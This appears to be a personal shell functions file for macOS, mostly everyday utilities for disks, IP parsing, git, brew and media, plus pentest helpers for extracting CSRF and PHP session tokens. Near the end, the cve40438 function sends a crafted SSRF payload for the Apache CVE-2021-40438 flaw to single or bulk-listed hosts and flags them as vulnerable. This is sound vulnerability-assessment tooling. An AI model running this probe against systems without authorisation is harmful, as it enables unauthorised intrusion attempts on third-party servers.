# File System Operations
# ---------------------

# Automate unmounting, sorting, and remounting using fatsort
fatsort_volume() {
  if [ -z "$1" ]; then
    echo "Usage: fatsort_volume <VolumeName>"
    return 1
  fi

  # Get the target volume (e.g., /Volumes/Untitled)
  volume_name="$1"

  # Find fatsort binary location
  if ! fatsort_path=$(command -v fatsort); then
    echo "Error: fatsort command not found. Please ensure it's installed and in your PATH."
    return 1
  fi

  # Check if volume is mounted and get device info
  device_node=$(diskutil info "$volume_name" | awk -F': *' '/Device Node/ {print $2}')
  if [ -z "$device_node" ]; then
    echo "Error: Volume '$volume_name' is not found or not mounted."
    return 1
  fi
  echo "Located device: $device_node"

  # Unmount the volume
  echo "Unmounting $volume_name..."
  if ! diskutil unmount "$volume_name"; then
    echo "Failed to unmount $volume_name."
    return 1
  fi

  # Run fatsort with sudo on the unmounted device
  echo "Running fatsort on $device_node..."
  if ! sudo "$fatsort_path" -q -n -f -c "$device_node"; then
    echo "fatsort failed on $device_node."
    return 1
  fi

  # Prompt to remount the volume
  echo "fatsort completed. Would you like to remount the volume? (y/n)"
  read -r response

  case "$response" in
    [yY]|[yY][eE][sS])
      echo "Remounting $device_node..."
      if ! diskutil mount "$device_node"; then
        echo "Failed to remount $device_node."
        return 1
      fi
      echo "$volume_name remounted."
      ;;
    *)
      echo "Leaving $volume_name unmounted."
      ;;
  esac
}

# mcd: Make directory and change into it
# Usage: mcd new_directory
mcd() {
    mkdir -p "$1" && cd "$1";
}

# alph_sort: Organize files into subdirectories based on their first letter
# Usage: cd messy_directory && alph_sort
alph_sort(){
    for f in *; do
        if [ -f "$f" ]; then
            mkdir -p "${f:0:1}"
            mv "$f" "${f:0:1}"
        fi
    done
}

# lscsv: List directory contents in CSV format
# Usage: lscsv > directory_contents.csv
lscsv() {
    ls -lT | awk '/^-/ && $1=$1' OFS=","
}

# Network & IP Operations
# ----------------------

# localip: Get local IP address(es) with labels
# Usage: localip      # returns all IPs with labels
localip() {
    local ips=($(ifconfig | grep 'inet ' | grep -v '127.0.0.1' | awk '{ print $2}'))
    local primary_ip=${ips[-1]}
    
    for ip in "${ips[@]}"; do
        if [ "$ip" = "$primary_ip" ]; then
            echo "Primary IP: $ip"
        else
            echo "Secondary IP: $ip"
        fi
    done
}

# iplist: Convert CIDR notation or comma-separated IPs/CIDRs to list of IPs
# Usage: iplist 192.168.1.0/24
# Usage: echo "192.168.1.1, 10.0.0.0/24" | pbcopy && iplist
# Usage: iplist nosort    # preserve original order
iplist() {
    local input="$1"
    local sort_flag="sort"
    
    # Check if input is a file or a direct argument
    if [ -z "$input" ]; then
        pbpaste | tr ', ' '\n' | sed '/^[[:space:]]*$/d' > ./.tmp_ip_list.txt
    else
        echo "$input" | tr ', ' '\n' | sed '/^[[:space:]]*$/d' > ./.tmp_ip_list.txt
        if [ "$input" = "nosort" ]; then
            sort_flag="nosort"
        fi
    fi

    if [ "$sort_flag" = "sort" ]; then
        cdrr=$(nmap -sL -n -T5 --open -iL ./.tmp_ip_list.txt 2>/dev/null | grepip | sort -Vu)
    else
        cdrr=$(nmap -sL -n -T5 --open -iL ./.tmp_ip_list.txt 2>/dev/null | grepip)
    fi

    echo "$cdrr"
    echo "$cdrr" | pbcopy
    cdrc=$(echo "$cdrr" | wc -l)
    echo '\n' "$cdrc" 'IPs'
    rm ./.tmp_ip_list.txt
}

# Pattern Matching Functions
# ------------------------

# grepeml: Extract email addresses from files or input
# Usage: cat file.txt | grepeml
# Usage: grepeml file1.txt file2.txt
grepeml() {
    rg -Nao --no-ignore -i "\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b" "$@" 2>/dev/null |
    command grep -Eoi "\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b"
}

# grepip: Extract IP addresses with version selection
# Usage: cat file.txt | grepip 4     # IPv4 only
# Usage: grepip 6 file.txt           # IPv6 only
# Usage: grepip all file.txt         # Both IPv4 and IPv6
grepip() {
    local version=${1:-"4"}  # Default to IPv4
    shift 2>/dev/null  # Remove first argument if it exists
    
    case $version in
        "4")
            rg -Nao --no-ignore -e '\b((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\.)){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\b' "$@" |
            command grep -Eo '\b((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\.)){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\b'
            ;;
        "6")
            rg -Nao --no-ignore -i '([0-9a-fA-F]{1,4}:){3,7}[0-9a-fA-F]{1,4}' "$@" 2>/dev/null |
            command grep -Eoi '([0-9a-fA-F]{1,4}:){3,7}[0-9a-fA-F]{1,4}'
            ;;
        "all")
            rg -Nao --no-ignore -e '\b((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\.)){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\b' \
                             -e '([0-9a-f]{1,4}:){3,7}[0-9a-f]{1,4}' "$@" |
            command grep -Eo '\b((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\.)){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\b|([0-9a-f]{1,4}:){3,7}[0-9a-f]{1,4}'
            ;;
    esac
}

# Security & Certificate Functions
# ------------------------------

# csrf: Extract CSRF token from cookie file
# Usage: csrf cookie.txt http://example.com/form
csrf(){
    curl -s -c $1 "$2" | awk -F 'value' '/user_token/ {print $2}' | cut -d "'" -f 2
}

# sessionid: Extract PHP session ID from file
# Usage: sessionid session_file.txt
sessionid(){
    grep PHPSESSID $1 | awk -F ' ' '{print $7}'
}

# whocerts: Check SSL certificate information
# Usage: whocerts example.com          # Brief check
# Usage: whocerts example.com full     # Detailed check
whocerts() {
    local domain=$1
    local detail=${2:-"brief"}  # Default to brief check
    
    if [ "$detail" = "brief" ]; then
        openssl s_client -showcerts -connect $domain:443 2>/dev/null | grep 'CN='
    else
        echo "1. Running openssl check:" && echo \
        | openssl s_client -showcerts -connect -servername $domain -connect $domain:443 2>/dev/null \
        | openssl x509 -inform pem -noout -text \
        && echo "2. Running nslookup" \
        && nslookup -vc -type=ANY $domain \
        && echo "3. Running nmap" \
        && nmap -p 443 --script ssl-cert $domain
    fi
}

# System Maintenance
# ----------------

# bcbc: Brew cleanup and diagnostic
# Usage: bcbc
bcbc(){
    if which pyenv >/dev/null 2>&1; then
        brew='env PATH=${PATH//$(pyenv root)\/shims:/} brew'
    fi
    brew tap --repair
    echo "${yellow}==>${reset} Running Brew Diagnostic..."
    brew doctor
    brew missing 2>&1
    echo -e "${green}==>${reset} Brew Diagnostic Finished."
}

# This will promote your work to main (with a merge commit), push it, and clean up the branch everywhere.
finish-branch() {
  echo "1. detect current branch"
  local branch=$(git symbolic-ref --short HEAD)  
  if [[ -z "$branch" ]]; then
    echo "Not in a git repo or detached HEAD"; return 1
  fi
  if [[ "$branch" == "main" ]]; then
    echo "You’re already on main — nothing to finish."; return 1
  fi

  echo "switch to main"
  git checkout main || return

  echo "merge with a commit"
  git merge --no-ff "$branch" -m "Merging $branch" || return

  echo "push main"
  git push origin main || return

  echo "delete remote branch"
  git push origin --delete "$branch" || return

  echo " delete local branch"
  git branch -d "$branch"
}

# pskill: Kill processes matching pattern
# Usage: pskill firefox    # Kills all processes with 'firefox' in name
pskill(){
    ps -ef | rg -i $1 | rg -v 'rg' | sed 's/  \+/ /g' | cut -d ' ' -f 2 | xargs kill -9
}

# Development Tools
# ---------------

# ipy: Smart iPython launcher that respects virtual environments
# Usage: ipy
ipy() {
    local PY_BIN
    local IPYTHON
    local PYV
    PY_BIN="$(python -c 'import sys; print(sys.executable)')"
    IPYTHON="$(dirname "$PY_BIN")/ipython"
    if [[ -x "$IPYTHON" ]]; then
        "$IPYTHON"
    else
        PYV="$(python -c 'import sys; print(".".join(str(i) for i in sys.version_info[:2]))')"
        echo "Looking for iPython for Python $PYV"
        PY_BIN="$($SHELL -i -c "python$PYV -c 'import sys; print(sys.executable)'")"
        "$(dirname "$PY_BIN")/ipython"
    fi
}

# Clipboard Operations
# ------------------

# impaste: Save clipboard image to temporary file and output contents
# Usage: impaste > screenshot.png
impaste(){
    tempfile=$(mktemp -t clipboard.XXXXXXXXXX.png)
    osascript -e 'set theImage to the clipboard as «class PNGf»' \
        -e "set theFile to open for access POSIX file \"$tempfile\" with write permission" \
        -e 'write theImage to theFile' \
        -e 'close access theFile'
    cat "$tempfile"
    rm "$tempfile"
}

# Media Conversion
# --------------

# mp4togif: Convert MP4 video to GIF
# Usage: mp4togif input         # Creates output.gif
# Usage: mp4togif input custom  # Creates custom.gif
mp4togif() {
    if [ -z "$1" ]; then
        echo "Usage: mp4togif filename (without .mp4 extension)"
        return 1
    fi
    
    if [ ! -f "$1.mp4" ]; then
        echo "Error: $1.mp4 not found"
        return 1
    fi
    
    local output=${2:-"output.gif"}
    ffmpeg -i $1.mp4 -r 10 -f image2pipe -vcodec ppm - | \
    convert -delay 5 -loop 0 - "$output" && \
    echo "Converted $1.mp4 to $output"
}

# Git Operations
# ------------

# gistx: Clone gist from clipboard URL to /opt/gists
# Usage: <copy gist URL> && gistx
gistx(){
    cd /opt/gists
    rm -rf .git
    git init
    git remote add origin `clipboard`
    git pull origin master
    echo '\nDONEZO\n'
    ls
}

# subdir: Execute command in all subdirectories
# Usage: subdir exec "npm install"    # Run npm install in all subdirs
# Usage: subdir git "status"          # Run git status in all subdirs
subdir() {
    local action=$1
    shift
    case $action in
        "exec")
            find . -maxdepth 1 -type d \( ! -name . \) \
            -exec bash -c "cd '{}' && pwd && $* && echo 'success'" \;
            ;;
        "git")
            find . -maxdepth 1 -type d \( ! -name . \) \
            -exec bash -c "cd '{}' && pwd && git $* && echo 'success'" \;
            ;;
    esac
}

# Git Alias Helper Functions
# -------------------

# Get current git branch name
git_current_branch() {
    local ref
    ref=$(git symbolic-ref --quiet HEAD 2> /dev/null)
    local ret=$?
    if [[ $ret != 0 ]]; then
        [[ $ret == 128 ]] && return
        ref=$(git rev-parse --short HEAD 2> /dev/null) || return
    fi
    echo ${ref#refs/heads/}
}

# Detect main branch name (main, trunk, or master)
git_main_branch() {
    if git rev-parse --git-dir >/dev/null 2>&1; then
        local branch
        for branch in main trunk; do
            if command git show-ref -q --verify refs/heads/$branch; then
                echo $branch
                return
            fi
        done
        echo master
    fi
}

# Go to finder window's directory and remove duplicates
function remove_dups() {
    # Navigate to the current Finder window's directory
    cd "$(osascript -e 'tell application "Finder" to if (count of windows) > 0 then get POSIX path of (target of front window as alias)' 2>/dev/null)"

    # Declare an associative array to keep track of file hashes
    typeset -A hashfiles

    # Find all files recursively and process them
    while IFS= read -r -d '' file; do
        # Calculate the MD5 hash of the file (fast hash method)
        hash=$(md5 -q "$file")

        if [[ -n "${hashfiles[$hash]}" ]]; then
            # Duplicate detected
            echo "Duplicate detected: $file and ${hashfiles[$hash]}"

            # Check if the filename ends with ' 2', ' 3', etc.
            if [[ "$file" =~ ' [0-9]+$' ]]; then
                # Delete the duplicate file
                rm "$file"
                echo "Deleted duplicate file: $file"
            else
                echo "Duplicate file not deleted (does not match pattern): $file"
            fi
        else
            # Store the hash and file path
            hashfiles[$hash]="$file"
        fi
    done < <(find . -type f -print0)

    echo "Duplicate check completed."
}

# Sets environment variables specifically for building and installing Python packages 
# that rely on Homebrew-installed libraries (e.g., ssdeep). This function is intended 
# to resolve build and architecture issues on macOS with ARM64 (Apple Silicon) systems. 
# Use this function only when encountering build errors due to missing or mismatched 
# library paths or architectures. Activating these settings globally may interfere with 
# other compilation tasks.
ssdeep_env() {
    export ARCHFLAGS="-arch arm64"
    export CFLAGS="-I/opt/homebrew/include"
    export LDFLAGS="-L/opt/homebrew/lib"
    echo "Environment set for ssdeep builds"
}

cve40438() {
  local ipport ipfile outfile bulk
  while [[ $1 ]]; do
    case $1 in
      -i) ipport=$2; shift 2 ;;
      -f) ipfile=$2; bulk=1; shift 2 ;;
      -o) outfile=$2; shift 2 ;;
      *)  echo "usage: cve40438 -i ip[:port] | -f file.csv [-o out.csv]"; return 1 ;;
    esac
  done
  [[ -z $ipport && -z $ipfile ]] && { echo "Specify -i or -f"; return 1; }
  [[ -n $outfile && ! -f $outfile ]] && echo "IP,Port,Version,HTTP_Code,Vulnerable" > "$outfile"

  probe() {
    local base="$3://$1"
    [[ ($3 == http  && $2 != 80) || ($3 == https && $2 != 443) ]] && base+=":$2"
    local payload="unix:$(python3 -c 'print(\"A\"*7701)')|http://192.0.2.1:9/"
    curl -ks -o /dev/null -w '%{http_code}' "$base/?$payload"
  }

  scan_host() {
    local host=$1 port=$2 scheme nmap_out ver major minor patch vuln code retry_port retry_scheme
    [[ -z $port ]] && { nc -z -w1 $host 80 2>/dev/null && port=80 || port=443; }

    echo "== nmap banner check =="
    nmap_out=$(nmap -Pn -p$port -sV --version-light -oG - "$host" 2>/dev/null | tr -d '\r')
    printf '%s\n' "$nmap_out" | sed 's/^/   /'

    [[ $nmap_out == *ssl* ]] && scheme=https || scheme=http
    ver=$(grep -oE 'Apache httpd [0-9]+\.[0-9]+\.[0-9]+' <<< "$nmap_out" | head -1 | awk '{print $3}')

    vuln="Unknown"
    if [[ -n $ver ]]; then
      IFS=. read -r major minor patch <<< "$ver"
      if (( major==2 && minor==4 && patch<=48 )); then
        vuln="Potential"; echo "→ Banner ≤2.4.48 ⇒ potentially vulnerable."
        [[ $nmap_out == *CentOS* || $nmap_out == *Red\ Hat* ]] && echo "  (CentOS/RHEL back-ports—check ≥2.4.6-97)."
      else
        vuln="Patched"; echo "→ Banner ≥2.4.49 ⇒ patched upstream."
      fi
    else
      ver="(none)"; echo "→ No Apache banner—CVE not applicable."
    fi

    [[ -z $bulk ]] && { echo; read -q "?Run curl probe? [y/N] " || { echo; return; }; echo; }

    code=$(probe "$host" "$port" "$scheme")
    if [[ $code == 000 ]]; then
      if (( port==80 )) && nc -z -w1 $host 443 2>/dev/null; then
        retry_port=443; retry_scheme=https
      elif (( port==443 )) && nc -z -w1 $host 80 2>/dev/null; then
        retry_port=80; retry_scheme=http
      fi
      if [[ -n $retry_port ]]; then
        echo "   (retrying on $retry_scheme://$host …)"
        code=$(probe "$host" "$retry_port" "$retry_scheme")
        port=$retry_port; scheme=$retry_scheme
      fi
    fi

    case $code in
      502|503) vuln="Vulnerable"; echo "Probe $code ⇒ **VULNERABLE**." ;;
      000)     echo "Probe 000 ⇒ WAF/firewall or vhost mismatch." ;;
      *)       echo "Probe $code ⇒ exploit not successful." ;;
    esac

    [[ -n $outfile ]] && printf '%s,%s,%s,%s,%s\n' "$host" "$port" "${ver:-none}" "$code" "$vuln" >> "$outfile"
  }

  if [[ -n $ipport ]]; then
    scan_host "${ipport%%:*}" "${ipport#*:}"
  else
    while IFS=, read -r h p <&3; do
      [[ -z $h ]] && continue
      echo "=============================================================="
      echo "Scanning $h${p:+:$p}"
      scan_host "$h" "$p"
      echo
    done 3< "$ipfile"
  fi
}




# The following snippet causes mcd to be completed like mkdir
compdefas () {
  if (($+_comps[$1])); then
    compdef $_comps[$1] ${^@[2,-1]}=$1
  fi
}
compdefas mkdir mcd